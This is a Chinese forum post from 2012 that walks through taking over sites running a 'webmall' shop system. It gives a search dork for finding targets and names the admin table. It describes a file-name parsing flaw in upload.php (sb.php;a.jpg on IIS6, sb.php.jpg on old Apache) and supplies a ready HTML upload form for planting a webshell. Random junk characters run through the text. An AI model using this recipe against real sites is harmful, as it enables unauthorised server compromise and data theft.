关键字:inurl:webmall/detail.php?id4 Y) c; ^( L. s
+ K. q, ]! ]& \. z/ v4 c
数据表:pwn_base_admin& p+ {, l4 G. J' ^5 K* K2 U; k4 h$ j: T
) k d- A( _5 V& W3 [+ B
关于拿shell
$ \* I3 T; g; p% q2 V( n * k1 c8 v4 A7 i/ w7 ~: F- R' F9 [
首先登录后台admin.php6 v5 \8 s" u+ o) v" @
/ y- V, E+ }- K8 k! v7 N
看了upload.php源码,分析了一个下午,然后大约是明白了虽然上传那里只允许上传gif,jpg,png,bmp四种文件,但是并没有对文件名做限制。2 d. }0 A. X/ g8 O; n
换句话说,sb.php;a.jpg这样的文件也是允许的,只要服务器是IIS6就拿到webshel,低版本的apache可以试着重命名为sb.php.jpg' [5 P# m2 s8 j5 Z* I* H6 o3 t
然后搞完了才发现,这里的比我的更精简,我那个蛋疼,膜拜下三石,然后就借用了,我的开始和他的一样是采取全部源码的,然后发现了更精简的" o I# P9 y) O
<form name="uploadForm" method="post" enctype="multipart/form-data" action="http://xxx.com/kedit/upload_cgi/upload.php"> 8 k6 y' a# Z% _4 X' s, T6 e
<input type="text" name="fileName" value="sb.php;a.jpg" /> 0 d; s- C; t* X
<input type="hidden" name="attachPath" value="news/pics/" /> + n! |& d/ {5 E& |6 t
<input type="file" name="fileData" size="14" /></td>
% D' P) r/ |' O! D6 V<input type="submit" name="button" value="确定" /> 6 f% l6 ~/ q n3 s; `
</form>( K- Z7 @1 v$ r& Y e5 }
$ [1 ^1 s1 m! r/ t s& r. a首先登录后台,然后把上面的文件保存为xx.html,修改action,然后再上传,如果为iis6就在上传了查看源码就好了。$ M2 A4 }4 {( W* S1 @8 d
0 P; ^' R* s" c' V/ ?- g s |
发表于 2012-11-9 20:52:15
收藏
支持
反对